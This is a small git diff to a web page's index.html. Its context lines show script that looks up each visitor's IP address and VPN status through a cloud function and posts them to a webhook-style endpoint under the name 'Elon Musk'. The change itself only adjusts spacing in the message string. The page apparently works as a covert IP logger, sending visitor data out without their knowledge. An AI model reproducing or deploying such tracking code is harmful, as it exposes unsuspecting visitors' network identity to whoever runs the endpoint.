diff --git a/Other/XYgu/index.html b/Other/XYgu/index.html
index 86e53e2..c7654d9 100644
--- a/Other/XYgu/index.html
+++ b/Other/XYgu/index.html
@@ -31,7 +31,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
var params = {
username: "Elon Musk",
avatar_url: "",
- content: "Did user use vpn?:" + usedvpn + "What is the ip?:" + userip
+ content: "Did user use vpn?: " + usedvpn + "What is the ip?: " + userip
}
request.send(JSON.stringify(params));